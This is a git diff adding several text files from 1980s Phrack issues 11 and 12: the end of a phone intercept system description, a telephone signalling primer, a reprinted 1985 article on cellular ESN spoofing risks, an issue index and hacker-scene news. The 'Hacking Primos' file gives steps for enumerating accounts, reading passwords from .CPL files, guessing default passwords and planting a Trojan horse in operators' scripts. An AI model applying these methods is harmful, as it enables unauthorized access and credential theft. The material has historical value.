+Automatic Intercept Communications Controller (AICC)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+         The AICC routes messages between the ARC and the TTS.  Two units are
+required to enhance system reliability.  Each pair of AICCs can communicate
+with up to 4 CAIS or LAIS subsystems.
+
+         The AICCs are similar to the Audio Communications Controllers (ACCs)
+in the ARS system, but AICCs use a Bisynchronous Communications Module (BSCM)
+instead of a LACIM.
+
+         An AICC can be equipped with up to 8 BSCMs, each of which handles one
+synchronous communication line to the TTS.  The BSCM models selected depend on
+the location of the AICC with respect to the CAIS/LAIS sites.  Standard SLIMs
+(Subscriber Line Interface Modules) are required for communication with the
+ARC.
+
+Trunk Time Switch (TTS)
+~~~~~~~~~~~~~~~~~~~~~~~
+         The TTS has two types of components: the Peripheral Modules (PMs) and
+the Common Controls (CCs).
+
+         The PM contains the printed circuit boards that provide the link
+between the end office's ANI trunks and the ARC and between the ONI trunks and
+the ACD.  The activity of the PM is under direction of the CC
+
+         A PM rack contains five types of circuit boards: Multi-frequency
+Receivers (MFRs), Analog Line Front Ends (ALFEs), T1 Front Ends (T1FEs),
+Peripheral Module Access Controllers (PMACs), and Multi-purpose Peripheral
+Devices (MPPDs).
+
+         The MFRs translate the intercepted number from multi-frequency tones
+to ASCII digits for ANI calls; for ONI calls that come through a trunk
+concentrator, the MFRs translate the tones sent by the concentrator to
+indicate an ONI call.  Based on the tones, the MFR determines the type of
+call: regular, trouble, etc.
+
+         ALFEs convert incoming analog data to digital form so that it can be
+switched on the digital network.  They also convert outgoing digital data back
+to analog.  Incoming ALFEs provide the link between the TTS and the analog
+trunks from the Class 5 End Offices.  Outgoing ALFEs provide the link between
+the TTS and the analog trunks to the ACD.
+         ALFE is subdivided into two types for both incoming and outgoing:
+ALFE-A (contains the control logic, PCM bus termination, and ports for 8
+trunks) and ALFE-B (contains ports for 16 trunks, but must be paired with an
+ALFE-A in order to use the control logic and PCM bus on the backplane).
+ALFE-As can be used without ALFE-Bs, but not vice versa.
+         Incoming ALFEs support E&M 2-wire, E&M 4-wire, reverse battery, and
+3-way signalling trunks.  Outgoing ALFEs support E&M 2-wire, reverse battery,
+and high-low trunking.
+
+         T1FEs provide the links between the TTS and the D3-type T1 spans from
+the end offices.  They also link the DARU VOCAL board ports and the TTS.  Each
+board has 24 ports in order to handle a single T1 span which carries 24 voice
+channels.
+
+         PMAC is based on a Motorola 68000 microprocessor that directs and
+coordinates data flow within the PM.
+
+         MPPD boards provide bus termination and the system clocks for the
+digital network.  The MPPD contains a master and a secondary clock, which are
+synchronized with the frequency of an incoming T-1 span.  The module also
+contains its own clock for use when T-1 synchronization is not available or
+lost.
+         The MPPD also generates the ringing tones, busy signals, and reorder
+tones heard by the customer and sends the zip (alert) tone to the operator.
+
+         The CC controls the interaction between the PM components and the
+DARU.  It contains the Office Dependent Data Base (ODDB), which is a system
+table that describes the configuration of the TTS.  The CC uses the ODDB to
+determine whether an incoming call is an ANI or ONI trunk.
+         The CC sets up paths through the digital network in order to
+coordinate the resources of the CAIS/LAIS.  It receives messages from the
+PMAC, stores information necessary for returning a response to the appropriate
+trunk, and controls message routing to and from the ARC or the operator.  It
+also synchronizes the TTS and the Directory Assistance System (DAS) for
+operator-caller communications.
+         The CC is a Power-series standalone processor that contains a central
+processing unit (CPU-2), based on the Motorola 68000 microprocessor.  The
+processor also contains distributed intelligence for controlling the memory
+subsystem, the IO (input/output) subsystem, and the disk/tape subsystem.  Each
+CC includes a Winchester disk drive, a quarter-inch tape drive, and additional
+miscellaneous hardware.
+
+DAIS II Audio Response Unit (DARU)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+         The DARU contains the VOCAL boards that produce automated
+announcements, which are compiled from a vocabulary stored in RAM.  A
+CAIS/LAIS contains 1 to 3 DARUs, each with 48 ports.
+         If a CAIS/LAIS houses more than one DARU, the units are multi-dropped
+together.  One DARU is always linked to the ARCs (either directly or by modems
+and telephone lines) so that the announcement vocabulary can be downloaded
+from the ARCs if necessary.
+
+:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:
+
+         Much of the information in this file is copied verbatim from the
+instructional booklet sent to me by CCI.  Their documentation is extremely
+in-depth and well written, and, with some looking over, is easy to
+understand. Much of the information in here is confusing with all of the
+acronyms used as well as technical terms, but if you cross-reference acronyms
+throughout the file, you should be able to see what it stands for.  Also, if
+you don't understand what something does, just think of it in terms of use by
+the telephone company in the context used and you can generally get an idea
+of what it does or is used for.  I hope you enjoyed this file and continue to
+read Phrack Inc. files to learn more about the system we use and experience.
+Any constructive suggestions are welcomed directly or indirectly.
+
+                                            Taran King
+
+:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:
diff --git a/phrack11/7.txt b/phrack11/7.txt
new file mode 100644
index 0000000..94601a8
--- /dev/null
+++ b/phrack11/7.txt
@@ -0,0 +1,209 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #7 of 12
+
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+                    !                                   !
+                    #     Hacking Primos I, II, III     #
+                    !                                   !
+                    #          (I&II  Revised)          #
+                    !                                   !
+                    #            By Evil Jay            #
+                    !                                   !
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+
+
+    Author Note:
+
+   Ugg! I looked at my first file after it was released and saw a lot of
+  misspellings, errors and other screw-ups and was completely embarrassed. I
+  did not have time to edit the file and I was also writing the second file
+  which dealt with gaining privileges. I threw these two files at Taran King
+  who in turn merged them together. So I humbly apologize for all of the
+  errors in the last file. In this file I will revise the old file and
+  continue with some more methods of gaining access and also list out some
+  very basic commands for beginners. As I said before, if you have any
+  questions you can reach me on any board I am currently inhabiting. Hope to
+  hear from you...
+
+
+    *** Gaining Access From Scratch ***
+
+   I made a mistake in my last file and stated that FAM was not a default. FAM
+  is a default, but it can be taken out by the system administrators.
+
+
+ To get a listing of every possible account on a system, it is really quite
+ easy. They are located in the MFD directories. Type:
+
+A MFD <MFD #> (Without the "<" and ">" signs)
+
+Or just:
+
+A MFD
+
+ Then type LD and hit return. Now, you will see a listing of files and
+ underneath should be a listing of directories appropriately named
+ Directories. These directories are valid User IDs. However, I believe that
+ directories that have an "*" character in them cannot be logged in to.
+
+
+   *** Getting Higher Access Revised ***
+
+  SYS1 is the highest system level there is. Meaning unless commands have to
+ be entered from the supervisors terminal, you can usually do anything with an
+ account that has SYS1 access. Also, I should clarify that SYS1 will not
+ always be the name of the highest access available. It could be named SYSTEM
+ or anything for that matter.
+
+  You are looking for a file with the extension .CPL - look for this file
+ under any of the SYS1 directories. When you find one, SLIST it. You are
+ looking for a line similar to:
+
+A <DIRECTORY NAME> <PASSWORD>
+
+It could look like:
+
+A LIB XXX
+
+LIB is the directory (user id) name.
+
+XXX is the password to that directory (user id).
+
+
+ When you have this, log into that account with the directory name and
+ password. If your lucky you'll gain access to that account. I have noticed
+ that a lot of high access accounts sometimes have the password XXXXXX or X.
+ Try these, I am unsure as to whether they are actual defaults or not.
+
+
+  Ah, the revision is done! Now some more ways to gain access...
+
+
+   *** The Trojan Horse ***
+
+  Providing you have access, you may or may not be able to edit a file in a
+ high access directory. If you can't then try the above technique and try to
+ hack a higher level account.
+
+
+  You will first want to learn the Command Processing Language (CPL). Type
+ HELP CPL for a list of commands and then play around and try to write your
+ own programs. If you don't have a manual handy, look at other CPL programs in
+ other directories you can access. Once you know CPL, all you have to do is
+ edit a CPL file in a high access dir. Add your own high level commands to the
+ program. Then replace the old file, logoff and wait until the operator(s)
+ decide to run your program. Hopefully, if everything goes well your routines
+ will help you with whatever you wanted. However it would be a good idea to
+ have your TH write a file to your directory telling you whether it has been
+ ran or not. I will discuss different Trojan Horses in later issues of Phrack.
+
+
+  Once on a Prime it is pretty easy to get other accounts so don't worry about
+ it. Just worry about getting on in the first place. Patience is definitely
+ required since many systems (particularly versions 19 up) tend to hang up
+ after the first invalid id/password combo.
+
+
+
+     *** Basic Commands For Beginners ***
+
+
+  This is a list of basic commands you can use once on a Prime system. I will
+  not go in-depth on a command, because you can do that for yourself by
+  typing:
+
+HELP <COMMAND NAME>
+
+
+
+SLIST <FILENAME>
+
+This will list out the contents of a file on a directory. Type in the full
+file name (plus extension).
+
+
+ATTACH <DIRECTORY NAME>
+
+This will attach you to another directory. For a full explanation type HELP
+ATTACH.
+
+
+LD
+
+This will list all the files and subdirectories in a directory.
+
+
+RLS -ALL
+
+Commands add up on the stack, and eventually after a pre-determined amount of
+commands you will get a message telling you that you are "now at command level
+XX". This command will release all those pent up commands in the stack.
+
+
+CPL <FILENAME>
+
+This will run a file with the extension ".CPL".
+
+
+COMINPUT <FILENAME>
+
+This will run a file with the extension ".COM"
+
+
+SEG <FILENAME>
+
+This will run a file with the extension ".SEG"
+
+
+STATUS USERS
+
+This will give you a listing of users and other information currently on the
+system.
+
+
+STATUS
+
+This will give you the status of the system and other information.
+
+
+EDIT (Or ED)
+
+This is a text editor.
+
+
+CHANGE_PASSWORD <OLD PASSWORD>
+
+Does just what it says it does.
+
+
+DELETE <FILENAME>
+
+Deletes a file.
+
+
+LOGOFF
+
+I think this is pretty obvious.
+
+
+LOGIN
+
+This will log you out and take you back to the login process, providing there
+is no logins-over-logins set by the administrators.
+
+
+This is a very small list, but will probably help the beginner greatly when
+he/she first logs on. Hope you enjoyed this issue...Look for Hacking Primos
+Part IV in Phrack, 12. Mebbe'.
+
+
+
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+                    !                                   !
+                    #           A Phrack,Inc            #
+                    !                                   !
+                    #           Presentation            #
+                    !                                   !
+                    -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+=========================================================================
diff --git a/phrack11/8.txt b/phrack11/8.txt
new file mode 100644
index 0000000..133134e
--- /dev/null
+++ b/phrack11/8.txt
@@ -0,0 +1,143 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #8 of 12
+
+
+                         Telephone Signalling Methods
+                         ----------------------------
+
+
+                           Written by Doom Prophet
+
+
+   This file explains the basic signalling methods in use by the telephone
+system and is intended for general understanding. The text that follows is not
+highly technical since this file is for basic understanding and aimed at less
+experienced phreaks. Still, the more experienced readers may want to read it
+as a review on the information.
+
+
+    Analog--Analog signals are those that have continuously and smoothly
+varying amplitude or frequency.  Speech signals are of this type when you
+consider tone, pitch and volume levels that vary according to the person
+speaking. When a person speaks into the transmitter on a telephone, the voice
+signals are made up of acoustical energy, which are then converted into
+electrical energy for transmission along a transmission medium.
+
+    Analog carrier facilities may operate over different media, such as wire
+lines, multi-wire cable, coaxial cable, or fiber optic cable. Copper wire is
+the most commonly used for subscriber loops.
+
+
+    A technique that allows for many signals to be sent along the same
+transmission path is called Multiplexing. Analog signals use Frequency
+Division Multiplexing or FDM.
+
+
+    Digital--Instead of the voice signal being processed as an analog signal,
+it is converted into a digital signal and handled with digital circuits
+throughout the transmission process. When it arrives at the CO that serves the
+called telephone, it is converted back to analog to reproduce the original
+voice transmission.
+
+
+    Pulse Code Modulation or PCM is when the binary signal is transmitted in
+serial form. Binary coding represents bits or binary digits at 0 and 1 levels.
+These levels have a definite time relationship with one another. Time Division
+Multiplexing or TDM is the type of multiplexing, sometimes abbreviated as MUX,
+done for digital transmission.
+
+
+    Metallic--Metallic facilities carry only one Voice Frequency (VF) channel.
+Typically, a metallic facility is used to connect business or residential
+lines to a CO. Coaxial cable can be used to transmit both Analog and Digital
+signals as well as Metallic signals.
+
+
+    VF channels have a 4000 Hz bandwidth, from 0 to 4000 Hz. However, the
+in-band range of the voice frequency is between 200 and 3400 Hz. Signals that
+are out of this frequency range but still within the VF channel are out of
+band signals. A supervisory equivalent to 2600 for out of band is 3700 Hz. The
+amount of VF channels vary according to the transmission facilities that are
+being used.
+
+
+    CCIS (Common Channel Interoffice Signalling) is where control or
+supervisory signals are sent on a separate data link between switching
+offices. CCIS links operate at 4800 bps, or baud. Signal Transfer Points in
+the switch send the supervisory information over the dedicated link. This
+prevents supervisory tones from subscriber stations to register with the
+telephone network as a change in trunk status.
+
+
+    Reverse Battery Signalling- When the called end answers, the polarity and
+condition of the Ring and Tip leads is reversed to indicate the status of the
+connection. Conditions for a call being placed, but not yet answered, is
+ground on the Tip and battery (the CO battery current is flowing through) on
+the Ring.  When the called party answers, by the action of relays in the
+switching equipment, current is reversed in the calling subscriber loop and
+battery is placed on the Tip and ground on the Ring, which remains during the
+talking.
+
+
+    E and M- Leads connecting switching equipment to trunk circuits are termed
+the E and M leads, for receive and transmit. The E lead reflects the far-end
+or terminating end condition of the trunk. Ground on the E lead indicates that
+a signal has been received from the other end. The E lead is open when the
+trunk is idle. The M lead reflects the the near end condition of the trunk. It
+is grounded when the trunk is idle, and goes to battery condition when the
+called party goes off hook. Long interoffice and short haul toll trunks use
+this signalling method.
+
+
+    It should be noted that AC signalling is Alternating Current, and is used
+on the intertoll network, and interoffice and short haul toll trunks. DC, or
+direct current, is used on two wire or intraoffice connections, and local
+interoffice trunks.
+
+    Single Frequency (SF)- Single Frequency is an in-band 2600 Hz signalling
+system. When a four wire trunk is idle, and is equipped for SF in band
+signalling, a 2600 Hz tone is being transmitted in both directions. When the
+trunk is seized at an originating position, the M lead is changed from ground
+to battery state. This removes the 2600 Hz supervisory tone from the outgoing
+trunk pair. The loss of the 2600 Hz will be detected at the far end by the SF
+signalling unit, changing the far end E lead condition from open to ground,
+causing switching equipment to function. When ground is restored to the M
+lead, replacing 2600 on the near end trunk, the pulsing of address information
+begins.
+
+
+    Multi-Frequency (MF)- The MF pulsing method uses AC signals in the voice
+frequency range, and transmits address information between COs by combinations
+of only 2 of 5 frequencies. MF is used for the sending of address information,
+as mentioned before. Other signalling methods are still required for trunk
+control and supervision. There are six MFs comprising MF codes. These are 200
+Hz apart in the 700-1700 range. Two frequencies are sent at once, thus
+explaining the term 'Multi frequency.'
+
+
+    MF pulsing is initiated by manual keysets and the TSPS switchboard, or by
+MF outpulsing senders in ESS and Xbar. MF pulsing is very rapid and only
+occurs when a connection is being established. KPs, or Key Pulses, are used as
+a signal to start MF pulsing. STs, or STart tones are used as a signal to
+indicate the end of MF pulsing.
+
+
+    As an example of MF signalling, take a toll switchboard trunk connected to
+a Xbar Central Office. The operator selects an idle trunk, and presses the KP
+button on the keyset to signal the distant sender or register link equipment
+to connect to a MF receiver. The S lamp on the keyset will light when the far
+end is ready to receive MF pulses. After keypulsing the digits of the called
+number, the operator presses the ST button, which indicates the end of pulsing
+and disconnects the keyset from the operator's cord circuit and extinguishes
+the KP and S lamps.
+
+
+    At the terminating CO, the two MF tones of each digit are amplified and
+limited in the MF receiver unit associated with the incoming sender and
+register circuit. The frequencies are selected by channel filters in the MF
+receiver and then detected. The DC voltage that results will operate the
+proper channel relays to continue with the process of placing the call.
+
+
+
diff --git a/phrack11/9.txt b/phrack11/9.txt
new file mode 100644
index 0000000..b72c0bf
--- /dev/null
+++ b/phrack11/9.txt
@@ -0,0 +1,280 @@
+                               ==Phrack Inc.==
+
+                   Volume Two, Issue Eleven, Phile #9 of 12
+
+  --------------------------------------------------------------------------
+     The following is reprinted from the November 1985 issue of Personal
+     Communications Technology magazine by permission of the authors and
+     the publisher, FutureComm Publications Inc., 4005 Williamsburg Ct.,
+     Fairfax, VA  22032, 703/352-1200.
+
+     Copyright 1985 by FutureComm Publications Inc.   All rights reserved.
+  --------------------------------------------------------------------------
+
+
+              THE ELECTRONIC SERIAL NUMBER: A CELLULAR 'SIEVE'?
+                  'SPOOFERS' CAN DEFRAUD USERS AND CARRIERS
+
+    by Geoffrey S. Goodfellow, Robert N. Jesse, and Andrew H. Lamothe, Jr.
+
+
+What's the greatest security problem with cellular phones? Is it privacy of
+communications?  No.
+
+Although privacy is a concern, it will pale beside an even greater problem:
+spoofing.
+
+'Spoofing' is the process through which an agent (the 'spoofer') pretends to
+be somebody he isn't by proffering false identification, usually with intent
+to defraud.  This deception, which cannot be protected against using the
+current U.S. cellular standards, has the potential to create a serious
+problem--unless the industry takes steps to correct some loopholes in the
+present cellular standards.
+
+Compared to spoofing, the common security concern of privacy is not so severe.
+Most cellular subscribers would, at worst, be irked by having their
+conversational privacy violated.  A smaller number of users might actually
+suffer business or personal harm if their confidential exchanges were
+compromised.  For them, voice encryption equipment is becoming increasingly
+available if they are willing to pay the price for it.
+
+Thus, even though technology is available now to prevent an interloper from
+overhearing sensitive conversations, cellular systems cannot--at any
+cost--prevent pirates from charging calls to any account. This predicament is
+not new to the industry.  Even though cellular provides a modern,
+sophisticated quality mobile communications service, it is not fundamentally
+much safer than older forms of mobile telephony.
+
+History of Spoofing Vulnerability
+
+The earliest form of mobile telephony, unsquelched manual Mobile Telephone
+Service (MTS), was vulnerable to interception and eavesdropping.  To place a
+call, the user listened for a free channel.  When he found one, he would key
+his microphone to ask for service: 'Operator, this is Mobile 1234; may I
+please have 555-7890.'  The operator knew to submit a billing ticket for
+account number 1234 to pay for the call.  So did anybody else listening to the
+channel--hence the potential for spoofing and fraud.
+
+Squelched channel MTS hid the problem only slightly because users ordinarily
+didn't overhear channels being used by other parties.  Fraud was still easy
+for those who turned off the squelch long enough to overhear account numbers.
+
+Direct-dial mobile telephone services such as Improved Mobile Telephone
+Service (IMTS) obscured the problem a bit more because subscriber
+identification was made automatically rather than by spoken exchange between
+caller and operator.  Each time a user originated a call, the mobile telephone
+transmitted its identification number to the serving base station using some
+form of Audio Frequency Shift Keying (AFSK), which was not so easy for
+eavesdroppers to understand.
+
+Committing fraud under IMTS required modification of the mobile--restrapping
+of jumpers in the radio unit, or operating magic keyboard combinations in
+later units--to reprogram the unit to transmit an unauthorized identification
+number. Some mobile control heads even had convenient thumb wheel switches
+installed on them to facilitate easy and frequent ANI (Automatic Number
+Identification) changes.
+
+Cellular Evolution
+
+Cellular has evolved considerably from these previous systems.  Signaling
+between mobile and base stations uses high-speed digital techniques and
+involves many different types of digital messages.  As before, the cellular
+phone contains its own Mobile Identification Number (MIN), which is programmed
+by the seller or service shop and can be changed when, for example, the phones
+sold to a new user.  In addition, the U.S. cellular standard incorporates a
+second number, the 'Electronic Serial Number' (ESN), which is intended to
+uniquely and permanently identify the mobile unit.
+
+According to the Electronic Industries Association (EIA) Interim Standard
+IS-3-B, Cellular System Mobile Station--Land Station Compatibility
+Specification (July 1984), 'The serial number is a 32-bit binary number that
+uniquely identifies a mobile station to any cellular system.  It must be
+factory-set and not readily alterable in the field.  The circuitry that
+provides the serial number must be isolated from fraudulent contact and
+tampering.  Attempts to change the serial number circuitry should render the
+mobile station inoperative.'
+
+The ESN was intended to solve two problems the industry observed with its
+older systems.
+
+First, the number of subscribers that older systems could support fell far
+short of the demand in some areas, leading groups of users to share a single
+mobile number (fraudulently) by setting several phones to send the same
+identification.  Carriers lost individual user accountability and their means
+of predicting and controlling traffic on their systems.
+
+Second, systems had no way of automatically detecting use of stolen equipment
+because thieves could easily change the transmitted identification.
+
+In theory, the required properties of the ESN allow cellular systems to check
+to ensure that only the correctly registered unit uses a particular MIN, and
+the ESNs of stolen units can be permanently denied service ('hot-listed').
+This measure is an improvement over the older systems, but vulnerabilities
+remain.
+
+Ease of ESN Tampering
+
+Although the concept of the unalterable ESN is laudable in theory, weaknesses
+are apparent in practice.  Many cellular phones are not constructed so that
+'attempts to change the serial number circuitry renders the mobile station
+inoperative.'  We have personally witnessed the trivial swapping of one ESN
+chip for another in a unit that functioned flawlessly after the switch was
+made.
+
+Where can ESN chips be obtained to perform such a swap?  We know of one recent
+case in the Washington, D.C. area in which an ESN was 'bought' from a local
+service shop employee in exchange for one-half gram of cocaine.  Making the
+matter simpler, most manufacturers are using industry standard Read-Only
+Memory (ROM) chips for their ESNs, which are easily bought and programmed or
+copied.
+
+Similarly, in the spirit of research, a west coast cellular carrier copied the
+ESN from one manufacturer's unit to another one of the same type and
+model--thus creating two units with the exact same identity.
+
+The ESN Bulletin Board
+
+For many phones, ESN chips are easy to obtain, program, and install.  How does
+a potential bootlegger know which numbers to use?  Remember that to obtain
+service from a system, a cellular unit must transmit a valid MIN (telephone
+number) and (usually) the corresponding serial number stored in the cellular
+switch's database.
+
+With the right equipment, the ESN/MIN pair can be read right off the air
+because the mobile transmits it each time it originates a call.  Service shops
+can capture this information using test gear that automatically receives and
+decodes the reverse, or mobile-to-base, channels.
+
+Service shops keep ESN/MIN records on file for units they have sold or
+serviced, and the carriers also have these data on all of their subscribers.
+Unscrupulous employees could compromise the security of their customers'
+telephones.
+
+In many ways, we predict that 'trade' in compromised ESN/MIN pairs will
+resemble what currently transpires in the long distance telephone business
+with AT&T credit card numbers and alternate long-distance carrier (such as
+MCI, Sprint and Alltel) account codes.  Code numbers are swapped among
+friends, published on computer 'bulletin boards' and trafficked by career
+criminal enterprises.
+
+Users whose accounts are being defrauded might--or might not--eventually
+notice higher-than-expected bills and be reassigned new numbers when they
+complain to the carrier.  Just as in the long distance business, however, this
+number 'turnover' (deactivation) won't happen quickly enough to make abuse
+unprofitable.  Catching pirates in the act will be even tougher than it is in
+the wireline telephone industry because of the inherent mobility of mobile
+radio.
+
+Automating Fraud
+
+Computer hobbyists and electronics enthusiasts are clever people.  Why should
+a cellular service thief 'burn ROMs' and muck with hardware just to install
+new IDs in his radio?  No Herculean technology is required to 'hack' a phone
+to allow ESN/MIN programming from a keyboard, much like the IMTS phone thumb
+wheel switches described above.
+
+Those not so technically inclined may be able to turn to mail-order
+entrepreneurs who will offer modification kits for cellular fraud, much as
+some now sell telephone toll fraud equipment and pay-TV decoders.
+
+At least one manufacturer is already offering units with keyboard-programmable
+MINs.  While intended only for the convenience of dealers and service shops,
+and thus not described in customer documentation, knowledgeable and/or
+determined end users will likely learn the incantations required to operate
+the feature.  Of course this does not permit ESN modification, but easy MIN
+reprogrammability alone creates a tremendous liability in today's roaming
+environment.
+
+The Rolls Royce of this iniquitous pastime might be a 'Cellular Cache-Box.' It
+would monitor reverse setup channels and snarf ESN/MIN pairs off the air,
+keeping a list in memory.  Its owner could place calls as on any other
+cellphone.  The Cache-Box would automatically select an ESN/MIN pair from its
+catalog, use it once and then discard it, thus distributing its fraud over
+many accounts.  Neither customer nor service provider is likely to detect the
+abuse, much less catch the perpetrator.
+
+As the history of the computer industry shows, it is not far-fetched to
+predict explosive growth in telecommunications and cellular that will bring
+equipment prices within reach of many experimenters.  Already we have seen the
+appearance of first-generation cellular phones on the used market, and new
+units can be purchased for well under $1000 in many markets.
+
+How High The Loss?
+
+Subscribers who incur fraudulent charges on their bills certainly can't be
+expected to pay them.  How much will fraud cost the carrier?  If the charge is
+for home-system airtime only, the marginal cost to the carrier of providing
+that service is not as high as if toll charges are involved.  In the case of
+toll charges, the carrier suffers a direct cash loss.  The situation is at its
+worst when the spoofer pretends to be a roaming user.  Most inter-carrier
+roaming agreements to date make the user's home carrier (real or spoofed)
+responsible for charges, who would then be out hard cash for toll and airtime
+charges.
+
+We have not attempted to predict the dollar losses this chicanery might
+generate because there isn't enough factual information information for anyone
+to guess responsibly.  Examination of current estimates of long-distance-toll
+fraud should convince the skeptic.
+
+Solutions
+
+The problems we have described are basically of two types.  First, the ESN
+circuitry in most current mobiles is not tamper-resistant, much less
+tamper-proof.  Second and more importantly, the determined perpetrator has
+complete access to all information necessary for spoofing by listening to the
+radio emissions from valid mobiles because the identification information
+(ESN/MIN) is not encrypted and remains the same with each transmission.
+
+Manufacturers can mitigate the first problem by constructing mobiles that more
+realistically conform to the EIA requirements quoted above.  The second
+problem is not beyond solution with current technology, either.  Well-known
+encryption techniques would allow mobiles to identify themselves to the
+serving cellular system without transmitting the same digital bit stream each
+time.  Under this arrangement, an interloper receiving one transmission could
+not just retransmit the same pattern and have it work a second time.
+
+An ancillary benefit of encryption is that it would reasonably protect
+communications intelligence--the digital portion of each transaction that
+identifies who is calling whom when.
+
+The drawback to any such solution is that it requires some re-engineering in
+the Mobile-Land Station Compatibility Specification, and thus new software or
+hardware for both mobiles and base stations.  The complex logistics of
+establishing a new standard, implementing it, and retrofitting as much of the
+current hardware as possible certainly presents a tough obstacle, complicated
+by the need to continue supporting the non-encrypted protocol during a
+transition period, possibly forever.
+
+The necessity of solving the problem will, however, become apparent.  While we
+presently know of no documented cases of cellular fraud, the vulnerability of
+the current standards and experience with similar technologies lead us to
+conclude that it is inevitable.  Failure to take decisive steps promptly will
+expose the industry to a far more expensive dilemma.  XXX
+
+
+Geoffrey S. Goodfellow is a member of the senior research staff in the
+Computer Science Laboratory at SRI International, 333 Ravenswood Ave., Menlo
+Park, CA 94025, 415/859-3098.  He is a specialist in computer security and
+networking technology and is an active participant in cellular industry
+standardization activities.  He has provided Congressional testimony on
+telecommunications security and privacy issues and has co-authored a book on
+the computer 'hacking' culture.
+
+Robert N. Jesse (2221 Saint Paul St., Baltimore, MD 21218, 301/243-8133) is an
+independent consultant with expertise in security and privacy, computer
+operating systems, telecommunications and technology management.  He is an
+active participant in cellular standardization efforts.  He was previously a
+member of the senior staff at The Johns Hopkins University, after he obtained
+his BES/EE from Johns Hopkins.
+
+Andrew H. Lamothe, Jr. is executive vice-president of engineering at Cellular
+Radio Corporation, 8619 Westwood Center Dr., Vienna, VA 22180, 703/893-2680.
+He has played a leading role internationally in cellular technology
+development.  He was with Motorola for 10 years prior to joining American
+TeleServices, where he designed and engineered the Baltimore/Washington market
+trial system now operated by Cellular One.
+   --------
+
+
+A later note indicates that one carrier may be losing something like $180K per
+month....
diff --git a/phrack12/1.txt b/phrack12/1.txt
new file mode 100644
index 0000000..7048b1e
--- /dev/null
+++ b/phrack12/1.txt
@@ -0,0 +1,42 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue 12, Phile #1 of 11
+
+                                    Index
+                                    ~~~~~
+                                   3/29/87
+
+
+         Ok, so we made it through another few delayed weeks of saying a
+release was coming soon.  But of course, I finally got motivated and got this
+issue moving.  I'd like to thank many of the people who rushed themselves to
+get their articles to me when they didn't know that the release was so soon,
+and for those that haven't gotten their articles in in time (for two issues,
+mind you [no names mentioned, of course, but I felt a denotation would be
+sufficient to provide my feelings in the introduction]) a big, "Oh well."
+We're glad you've continued your patronage (Ha!) with Phrack Inc. over the
+past year and a half or so and a big thanks to all of the writers who have
+kept the publication going for all this time.  But after this issue comes a
+break.  Not a break in putting Phrack out, but a break in the grind and rush
+to get it out as I did with this issue.  Phrack 13 will be EXTREMELY
+different, and I guarantee that to you.  Phrack 13 will be released on April
+1st (hmm...ring any bells?) so be watching for it!  Later
+
+                                                     Taran King
+                                            Sysop of Metal Shop Private
+
+------------------------------------------------------------------------------
+
+This issue of Phrack Inc. includes the following:
+
+#1  Index of Phrack 12 by Taran King (2.3 k)
+#2  Pro-Phile IX on Agrajag The Prolonged by Taran King (6.7 k)
+#3  Preview to Phrack 13-The Life & Times of The Executioner (4.9 k)
+#4  Understanding the Digital Multiplexing System (DMS) by Control C (18.8 k)
+#5  The Total Network Data System by Doom Prophet (13.2 k)
+#6  CSDC II - Hardware Requirements by The Executioner (8.1 k)
+#7  Hacking : OSL Systems by Evil Jay (8.7 k)
+#8  Busy Line Verification Part II by Phantom Phreaker (9.1 k)
+#9  Scan Man's Rebuttal to Phrack World News (16.5 k)
+#10 Phrack World News XII Part I by Knight Lightning (13.3 k)
+#11 Phrack World News XII Part II by Knight Lightning (14.7 k)
diff --git a/phrack12/10.txt b/phrack12/10.txt
new file mode 100644
index 0000000..725c805
--- /dev/null
+++ b/phrack12/10.txt
@@ -0,0 +1,239 @@
+                               ==Phrack Inc.==
+
+                    Volume Two, Issue 12, Phile #10 of 11
+
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+             PWN                                             PWN
+             PWN    >>>>>=-*{ Phrack World News }*-=<<<<<    PWN
+             PWN                 Issue XII/1                 PWN
+             PWN                                             PWN
+             PWN       Created, Compiled, and Written        PWN
+             PWN             by Knight Lightning             PWN
+             PWN                                             PWN
+             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+Local News                                                      March 20, 1987
+~~~~~~~~~~
+        This issue of PWN marks the anniversary of Metal Shop Brewery.
+
+Things are looking up.  Metal Shop Private is back and all previous members
+are asked to call back.  The same passwords and logons still work and even
+better, the old posts have been saved despite the hard drive crash a few
+months ago.
+
+       Phrack XIII will be released on April 1, 1987; April Fool's Day!
+
+It features joke files, fiction files, humorous files, and of course, rag
+files.  With all the seriousness of the regular issues of Phrack, this is a
+chance to release some building flashes of comedy.  Please note that files for
+Phrack XIII can only be submitted by members of Metal Shop Private.  This does
+not apply to other issues of Phrack.  Don't miss it!
+
+                                SummerCon 1987
+                                ~~~~~~~~~~~~~~
+For those that don't already know, TeleComputist Newsletter and Phrack Inc.
+are sponsoring this year's big phreak gathering in St. Louis, Missouri.  As
+many of you may note, St. Louis is the home of Metal Shop Private, Phrack
+Inc., and TeleComputist Newsletter.  We all hope that since St. Louis is in
+the middle of the country that it will be easy for people to attend.  We
+extend an invitation to anyone who wants to come.  We will have a conference
+room and two suites in a hotel in St. Louis.
+
+The official date for SummerCon 1987 is June 19,20.  This is far enough into
+the summer that everyone of the younger generation should be out of school and
+early enough that no one has to worry about facing reality right away.  This
+date has also been chosen specifically as to not interfere with the St. Louis
+VP Fair (Vale Profit).
+
+If you are going to attend SummerCon, we ask that you contact Knight
+Lightning, Taran King, or Forest Ranger for more details.  The TeleComputist
+Information Line is (314) 921-7938.  The names of those attending will be kept
+confidential so as to not cause anyone discomfort, however we do ask that you
+identify yourself at the conference by means of a name tag or some form of
